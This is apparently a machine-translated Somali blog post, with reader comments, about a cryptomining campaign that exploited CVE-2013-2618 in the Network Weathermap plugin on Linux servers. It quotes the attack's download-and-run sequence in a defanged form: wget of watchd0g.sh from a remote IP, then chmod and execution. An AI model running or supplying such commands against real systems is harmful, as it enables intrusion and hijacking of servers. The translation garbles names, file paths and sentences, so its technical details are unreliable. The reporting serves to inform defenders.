Tani waxay ka timid macdan qode cryptocurrency iyadoo la adeegsanayo kombuyuutarro fog ogolaansho la'aan kuwa leh kuwan waxay noqonayaan isbeddel. Horey ayaan ugala hadlay tan dhowr jeer halkan baloog ku saabsan xaaladda noocan ah.
Waana tan tan mar horeba gebi ahaanba ka baxday xakamaynta laga bilaabo xilligan lacagta loo yaqaan 'cryptocurrencies' waxay qaateen meel aad iyo aad u qiimo badan, dadka leh aqoon ku filan oo ay ku heli karaan kombuyuutarro ku xad gudbaya amnigooda ayaa iska lumiyay waqti luminta raadinta macluumaad muhiim ah ama akoonno bangi si ay u helaan faa'iido lacageed
Halkii ay tan ka samayn lahaayeen, waxay doortaan waxa ugu fudud ee la sameeyo: inay la wareegaan kooxahan oo ay ku midoobaan shabakada macdanta iyo waliba howlaha kale ee ay badanaa ku qabtaan botnet.
Sidan oo kale badanaa way ka sii badan tahay inaad dib u soo celiso maxaa yeelay waxay kaliya diirada saarayaan lacagta degdega ah ee tan soo saarta.
Fahamka caqliga leh ee isbeddellada suuqa iyo aqoonta saxda ah ee ganacsiga loo yaqaan 'crypto trading', qofku wuxuu goosan karaa faa'iidooyin badan
Linux runti ma nidaam aamin ah baa?
Inbadan oo naga mid ah waxay leeyihiin fikradda ah in Linux ay tahay nidaam hawlgal oo amni ku dhow, xaqiiqadu waxay tahay inay wali leedahay cillado.
Hagaag ayaa lehmaalmaha qaar TrendMicro ayaa raadisay, taas oo shaaca ka qaaday cusub cillad ku timid nidaamyada Linux-ka ee siiyay jabsadayaasha faa iidada macdanta "cryptocurrencies" adoo adeegsanaya Linux server iyo mashiinno.
Hadal qoraal ah adoo adeegsanaya bartaada internetka waxay faallo ka bixiyeen waxyaabaha soo socda:
Iyadoo loo marayo kormeerkeena laxiriira ka jawaab celinta dhacdada, waxaan aragnay isku dayga faragalinta ee tilmaamayaasheeda aan awoodnay inaan kuxirano ololihii hore ee macdanta ee loo adeegsaday khariidada JenkinsMiner.
Farqiga u dhexeeya: ololahani wuxuu ku wajahan yahay server-yada Linux. Sidoo kale waa kiis taariikhi ah oo dayacanka dib loo isticmaalay, iyadoo laga faa'iideysanayo cillad nabadgelyo oo gabowday oo balastarkeeda la heli karo ku dhowaad shan sano.
Sii deyntaan iyada oo loo marayo falanqayntaada lagu guuleystay in la aqoonsado goobaha ay dhibaatadu saameysey guul darradu taas Waxay inta badan saameysaa Japan, Taiwan, China, USA iyo India.
Falanqaynta weerarka
Iyadoo loo marayo falanqeyn by Shabakada Ilaalinta Trend Micro Smart faahfaahin ka bixi sida weeraryahannadu uga faa'iidaystaan cilladdan:
Hawl wadeenada ololahan waxay ka faa'iideysanayeen CVE-2013-2618, oo ah nuglaansho taariikheysan oo ku jirta plugin Camapi Network Weathermap, oo ay maamulayaasha nidaamku u adeegsadaan inay ku indha indheeyaan dhaqdhaqaaqa shabakadda.
Sababta ay uga faa'iideysanayaan cillad hore oo xagga amniga ah: Shabakadda Weathermap-ka waxay leedahay laba jeer oo keliya nuglaanta guud ee la soo sheegay illaa hadda, labadaba laga bilaabo Juun 2014.
Weeraryahannadan ayaa laga yaabaa inay ka faa'iideysanayaan oo keliya cillad nabadgelyo oo laga faa'iideysan karo laakiin sidoo kale dib u dhaca balastarka ku dhaca ururada isticmaalaya aaladda furan.
Asal ahaan Weerarku wuxuu u socdaa weerar XSS ah:
Qeybta wareersan waa bartilmaameedka weerarka, adeegaha shabakada oo leh deked.
Faylka /plugins/weathermap/configs/conn.php waa faylka ka dhashay weerarkii joogtada ahaa ee XSS / plugins / weathermap / php .
Intaa waxaa dheer in isku xidhka Markii hore, waxaan aragnaa codsi la mid ah HTTP oo lagu dabaqay bog la yiraahdo ' qabow.php '.
Barnaamijka macdanta 'Cryptocurrency' waxaa loo qaybiyaa iyada oo loo marayo dayacanka laga bilaabo khariidadda cimilada ee PHP ee bartilmaameedyada ah serverka Linux
Sawirka waxaad ku arki kartaa sida loo soo abaabulay weerarka oo waxaa lagu sifeeyey sidan soo socota:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Waxa ay sameyso ayaa ah dirista tilmaanta si loo soo dejiyo feyl leh wget, taas oo ah utility in ku dhowaad dhammaan qaybinta Linux ay ku rakibtay qaab ahaan.
chmod 775 watchd0g.sh
wuxuu faylka ka dhigayaa mid la fulin karo
./watchd0g.sh
Waxa ugu dambeyntii ay sameyso waa helitaanka feylka si uu ugu shaqeeyo serverka.
Nasiib wanaag, waxaa jira balastar ( CVE-2013-2618 ) diyaar u ah guuldarada iyo Waad soo dejisan kartaa ka isku xirkaan
Si aad rabto inaad waxbadan ka ogaato guuldarrooyinkan waxaad booqan kartaa xiriiriyahan.
Inaad doqon noqotaa amaan maahan, oo inkasta oo taasi Linux kuu badbaadinayso.
Ma cusbooneysiin karo jaamaha amniga ma ahan qaladka Linux. Waa khaladka in shirkadaha qaar, si ay lacag u kaydsadaan, ay u kiraystaan nacasyadooda maamuleyaasha nidaamka,
Laakiin sidaas oo ay tahay, WAA LAGA HELAY DEG-DEG isla markaana isla markiiba waa la xalliyaa, xitaa wixii yar ee nabadgelyo ee tan oo kale ah waa la daabacay.
Maxaase qalad ah oo Linux ay leedahay in cusbooneysiintiisa aan lagu dabaqin? Soosaarayaasha GNU / Linux waxay fuliyaan hadafkooda iyagoo horumarinaya xalalka u nuglaanta soo ifbaxaya ugana dhigaya kuwa isticmaala. Haddii dhakhtarku kuu qoro tallaalka hargabka oo aadan helin, waad bukoodaa oo adkaataa… dhakhtarka ayaa khaladkiisa leh?
DesdeLinux Ma aha waxa ay ahayd, laba sheeko oo isku xigta oo leh laba khalad oo muhiim ah:
1.- Tifatirayaasha wanaagsan si ay u horumariyaan waxay dhigaan mid aan aheyn barnaamij bilaash ah waxayna ilaawaan kuwa kale ee ah (waxaa lagu xusay faallooyinka).
2.- Warar aad u weyn oo ku saabsan virus marka ay kaliya saameynayaan server-yada aan la cusbooneysiin. Laakiin haddii wax Linux ah loo cusboonaysiiyay asal ahaan muddo tobanaan sano ah. Si cabsi loo dhigo sidii haddii loo baahdo antivirus nuugaya antivirus-ka. Waxay u muuqdaan inay isku dayayaan inay dhahaan Linux waa lamid Windows iyo maya.
Haddii cayayaan duug ah oo horay loo dhajiyay, war iyo waxba midna ma ahan. Ha ciyaarin Microsoft iyo shirkadaha antivirus-ka sida Trend Micro, Norton, Panda ama McAffee, ama lacag ha ku siin.
By the way, waxaan isticmaaleynay Trend Micro dhowr sano oo shirkada ah waxayna ahayd baradho dhab ah, shit, maxaa yeelay nidaamkeeda ayaa sheegay in la fulin karo uu lahaa "raadadka" fayrasyada (wax uu noqon karo virus, xitaa haduu yahay maahan) iyo sababta ay u saartay (waxay u qaadatay diiwaanka si uusan u sii socon) uma ogolaanayo isticmaalkeeda, mana heysan liis cad oo ay ku joojiso dhaqankan feyl aamin ah oo fulin ah oo aan u baahanahay inaan isticmaalno . Maxaa qasan. Waxay ahayd nooca shirkadda, nooca shaqsiyeed wuxuu lahaa suurtagalnimada liistada. Dareen leh.
Ha ku sharraxin naftaada si xarrago leh.
Maqaalku wuxuu ka hadlayaa dalool amni oo kuu ogolaanaya inaad gasho barnaamij, kana dhigto mid la fulin karo oo socodsiin kara, kaas oo ah godka amniga ee virus kasta u baahan yahay inuu faafo, sida muuqata inuu yahay virus uu u baahan yahay in barnaamijka la galay uu ku jiro koodhkiisa. suurtagalnimada in kombiyuutarrada lagu baaro shabakadda in lagu celiyo hawlgalka iyo is-nuqul. Si sax ah uma sameeynayaan tan sababtoo ah Linux meelaha godadka amniga laga helay waxaa daboolaya balastar amni, waana taas tan aan ula jeedo farqiga u dhexeeya Windows iyo Linux, maadaama antivirus uusan loo baahneyn, laakiin in la daboolo daloolka. Windows-ka way ku adagtahay dhowr sababood awgood: 1.- Faylasha waxaa lagu fulin karaa si fudud kordhintooda, iyadoo laga takhalusi karo tallaabada hordhaca ee kombiyuutarka ay dhibaatadu saameysey 2. - Isticmaalayaashu waxay si joogto ah u rakibayaan barnaamijyo asal ahaan shaki ku jiro maxaa yeelay waa kuwo lahaansho leh waxayna u baahan yihiin inay haystaan iyaga oo aan lacag bixin (waxba kama dhahayo waxa ay noqon laheyd dhaqaalaha guriga inuu iibsado MS Office, Photoshop, ... in ka badan labanlaabidda qiimaha qalabka kombiyuutarka). 3.- Goor dhow ama goor dambe Windows wuu soo daadan doonaa, isticmaalaha ayaa u geynaya deriska, saaxiib, ... kaasoo, si uusan waqti ugu lumin, u qaabeeyo wax walba oo uu ku rakibo Windows-ka kama dambaysta hawl-qabad aan la cusbooneysiin ama taas balastarka laftiisa ayaa dhigaya barnaamij basaasnimo ah. Waxay noqon kartaa inaysan ahayn oo ay weyn tahay, laakiin waxay noqon kartaa inay tahay oo ay leedahay Windows basaasid furaha sirta ah. Maqaalka waxay ku xusayaan nidaamka hordhaca ah ee khidad jilicsan oo ay saameyn ku yeelatay jilicsanaanta, sameynta barnaamijka si toos ah u baaraya shabakada una adeegsanaya inuu iskiis u nuqulo kuna shaqeeyo serverka waa qeybta ugu fudud ee wax walba, sababtaas darteed maxaa loogu sheegay qodobku waa tallaabada ugu muhiimsan ee fayras kasta: ogaanshaha u nuglaanta nidaamka in la weeraro.
Xog xun. Tani khalad kuma aha Linux, waa cilad ku jirta CODSIGA PHP, taasi waa, waa iskutallaab. Xitaa kuma xirna nidaamyada shaqeynaya kernel-ka Linux! Laakiin xitaa haddii codsigu uusan ahayn mid isweydaarsanaya, ma ahan cillad Linux ah, waxay noqonaysaa uun codsi.
Kernel-ka 'Linux' ma laha faragelin yar oo looga hortagayo weerarada qoritaanka iskutallaabta bogga sidan oo kale. Uguyaraan baar shanta daqiiqadood kahor intaadan dhejin sababtoo ah runta qofkasta oo wax yar ka og wax, waxaad u muuqan doontaa mid xun.